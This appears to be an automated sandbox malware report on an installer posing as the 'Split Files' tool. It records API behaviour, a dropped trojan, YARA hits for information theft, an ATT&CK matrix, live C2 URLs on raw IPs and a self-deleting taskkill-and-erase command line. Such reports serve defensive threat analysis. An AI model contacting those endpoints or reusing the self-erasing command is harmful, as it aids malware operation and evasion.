                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\Jump to behavior
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0041336B
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,5_2_00402BF0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,5_2_00402F20
                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0044028F mov eax, dword ptr fs:[00000030h]5_2_0044028F
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0042041F mov eax, dword ptr fs:[00000030h]5_2_0042041F
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004429E7 mov eax, dword ptr fs:[00000030h]5_2_004429E7
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00417BAF mov eax, dword ptr fs:[00000030h]5_2_00417BAF
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_100091C7 mov eax, dword ptr fs:[00000030h]5_2_100091C7
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_10006CE1 mov eax, dword ptr fs:[00000030h]5_2_10006CE1
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00105B47 mov eax, dword ptr fs:[00000030h]6_2_00105B47
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_001033EF mov eax, dword ptr fs:[00000030h]6_2_001033EF
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0040F789 SetUnhandledExceptionFilter,5_2_0040F789
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0041336B
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0040F5F5
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040EBD2
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_10006180
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_100035DF
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_10003AD4
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00101889 SetUnhandledExceptionFilter,6_2_00101889
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00101269 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00101269
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_001016F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_001016F5
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00104362 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00104362
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f Jump to behavior
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00459734 GetVersion,GetModuleHandleA,6CAD5550,6CAD5550,6CAD5550,AllocateAndInitializeSid,LocalFree,4_2_00459734
                Source: SplitFiles131.exe, 00000005.00000002.372668161.000000000351F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: SplitFiles131.exe, 00000005.00000002.372668161.000000000351F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: program manager
                Source: SplitFiles131.exe, 00000005.00000002.372668161.000000000351F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: F.program manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,1_2_004051D8
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,1_2_00405224
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: GetLocaleInfoA,4_2_004085FC
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: GetLocaleInfoA,4_2_00408648
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,5_2_00404D40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,5_2_00427041
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,5_2_0042708C
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,5_2_00427127
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_004271B2
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,5_2_0041E2FF
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,5_2_00427405
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0042752B
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,5_2_00427631
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00427700
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,5_2_0041E821
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00426D9F
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0040F7F3 cpuid 5_2_0040F7F3
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00455E7C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6CAD5CA0,SetNamedPipeHandleState,6CF47180,CloseHandle,CloseHandle,4_2_00455E7C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004026C4 GetSystemTime,1_2_004026C4
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00405CC0 GetVersionExA,1_2_00405CC0
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00453D18 GetUserNameA,4_2_00453D18

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.3340000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.3340000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Windows Management Instrumentation
                Path Interception1
                Access Token Manipulation
                1
                Disable or Modify Tools
                1
                Input Capture
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium2
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts2
                Native API
                Boot or Logon Initialization Scripts13
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                Account Discovery
                Remote Desktop Protocol1
                Input Capture
                Exfiltration Over Bluetooth2
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information
                Security Account Manager3
                File and Directory Discovery
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)23
                Software Packing
                NTDS26
                System Information Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer11
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                Masquerading
                LSA Secrets14
                Security Software Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Virtualization/Sandbox Evasion
                Cached Domain Credentials1
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job13
                Process Injection
                Proc Filesystem11
                Application Window Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 778228 Sample: file.exe Startdate: 05/01/2023 Architecture: WINDOWS Score: 96 47 45.139.105.1 CMCSUS Italy 2->47 49 85.31.46.167 CLOUDCOMPUTINGDE Germany 2->49 51 Snort IDS alert for network traffic 2->51 53 Antivirus detection for URL or domain 2->53 55 Detected unpacking (changes PE section rights) 2->55 57 4 other signatures 2->57 10 file.exe 2 2->10         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\is-DTRND.tmp, PE32 10->31 dropped 13 is-DTRND.tmp 13 30 10->13         started        process6 file7 33 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 13->33 dropped 35 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 13->35 dropped 37 C:\...\unins000.exe (copy), PE32 13->37 dropped 39 3 other files (2 malicious) 13->39 dropped 16 SplitFiles131.exe 24 13->16         started        process8 dnsIp9 41 107.182.129.235, 49706, 80 META-ASUS Reserved 16->41 43 171.22.30.106, 49707, 80 CMCSUS Germany 16->43 45 45.139.105.171, 49705, 80 CMCSUS Italy 16->45 29 C:\Users\user\AppData\...\KN38AzDG.exe, PE32 16->29 dropped 20 KN38AzDG.exe 16->20         started        23 cmd.exe 1 16->23         started        file10 process11 signatures12 59 Multi AV Scanner detection for dropped file 20->59 25 taskkill.exe 1 23->25         started        27 conhost.exe 23->27         started        process13

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                No Antivirus matches
                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\Split Files\SplitFiles131.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_iscrypt.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_setup64.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe50%ReversingLabsWin32.Trojan.Generic
                SourceDetectionScannerLabelLinkDownload
                5.2.SplitFiles131.exe.10000000.6.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                1.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                5.2.SplitFiles131.exe.400000.0.unpack100%AviraHEUR/AGEN.1250671Download File
                4.2.is-DTRND.tmp.400000.0.unpack100%AviraHEUR/AGEN.1248792Download File
                1.0.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.innosetup.com/0%URL Reputationsafe
                http://www.innosetup.com/0%URL Reputationsafe
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte0%URL Reputationsafe
                http://107.182.129.235/storage/extension.php0%URL Reputationsafe
                http://www.remobjects.com/?ps0%URL Reputationsafe
                http://www.innosetup.com0%URL Reputationsafe
                http://107.182.129.235/storage/ping.php0%URL Reputationsafe
                http://171.22.30.106/library.php100%URL Reputationmalware
                http://www.remobjects.com/?psU0%URL Reputationsafe
                http://rus.altarsoft.com/split_files.shtml0%Avira URL Cloudsafe
                http://www.altarsoft.com/split_files.shtml0%Avira URL Cloudsafe
                http://www.altarsoft.com/split_files.shtml2%VirustotalBrowse
                http://171.22.30.106/library.phpch100%Avira URL Cloudmalware
                http://www.innosetup.comDVarFileInfo$0%Avira URL Cloudsafe
                http://171.22.30.106/library.phpYQ100%Avira URL Cloudmalware
                http://171.22.30.106/library.php4100%Avira URL Cloudmalware
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixintetrue
                • URL Reputation: safe
                unknown
                http://107.182.129.235/storage/extension.phptrue
                • URL Reputation: safe
                unknown
                http://107.182.129.235/storage/ping.phptrue
                • URL Reputation: safe
                unknown
                http://171.22.30.106/library.phptrue
                • URL Reputation: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.innosetup.com/is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.altarsoft.com/split_files.shtmlis-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-8E2LT.tmp.4.dr, is-7O3KV.tmp.4.dr, is-R2P47.tmp.4.dr, is-JMARM.tmp.4.dr, is-B20UO.tmp.4.dr, is-UJJ0L.tmp.4.dr, is-JSP8F.tmp.4.dr, is-79U67.tmp.4.dr, is-APJVT.tmp.4.dr, is-7L4JB.tmp.4.drfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://171.22.30.106/library.phpchSplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www.remobjects.com/?psfile.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drfalse
                • URL Reputation: safe
                unknown
                http://rus.altarsoft.com/split_files.shtmlis-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-3OAED.tmp.4.dr, is-FBKGV.tmp.4.drfalse
                • Avira URL Cloud: safe
                unknown
                http://www.innosetup.comfile.exefalse
                • URL Reputation: safe
                unknown
                http://171.22.30.106/library.phpYQSplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://171.22.30.106/library.php4SplitFiles131.exe, 00000005.00000003.332714577.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.327425336.00000000043C6000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www.innosetup.comDVarFileInfo$file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drfalse
                • Avira URL Cloud: safe
                low
                http://www.remobjects.com/?psUfile.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                45.139.105.171
                unknownItaly
                33657CMCSUStrue
                45.139.105.1
                unknownItaly
                33657CMCSUStrue
                85.31.46.167
                unknownGermany
                43659CLOUDCOMPUTINGDEtrue
                107.182.129.235
                unknownReserved
                11070META-ASUStrue
                171.22.30.106
                unknownGermany
                33657CMCSUStrue
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:778228
                Start date and time:2023-01-05 08:46:10 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 19s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:14
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal96.troj.evad.winEXE@12/39@0/5
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 186
                • Number of non-executed functions: 260
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                08:47:09API Interceptor1x Sleep call for process: KN38AzDG.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                45.139.105.171file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                file.exeGet hashmaliciousBrowse
                • 45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                CMCSUSfile.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                bun4.exeGet hashmaliciousBrowse
                • 45.139.105.105
                CMCSUSfile.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                file.exeGet hashmaliciousBrowse
                • 171.22.30.106
                bun4.exeGet hashmaliciousBrowse
                • 45.139.105.105
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                C:\Program Files (x86)\Split Files\is-AGVDF.tmpfile.exeGet hashmaliciousBrowse
                  file.exeGet hashmaliciousBrowse
                    file.exeGet hashmaliciousBrowse
                      file.exeGet hashmaliciousBrowse
                        file.exeGet hashmaliciousBrowse
                          file.exeGet hashmaliciousBrowse
                            file.exeGet hashmaliciousBrowse
                              file.exeGet hashmaliciousBrowse
                                file.exeGet hashmaliciousBrowse
                                  file.exeGet hashmaliciousBrowse
                                    file.exeGet hashmaliciousBrowse
                                      file.exeGet hashmaliciousBrowse
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2193
                                        Entropy (8bit):4.702648325021821
                                        Encrypted:false
                                        SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                                        MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
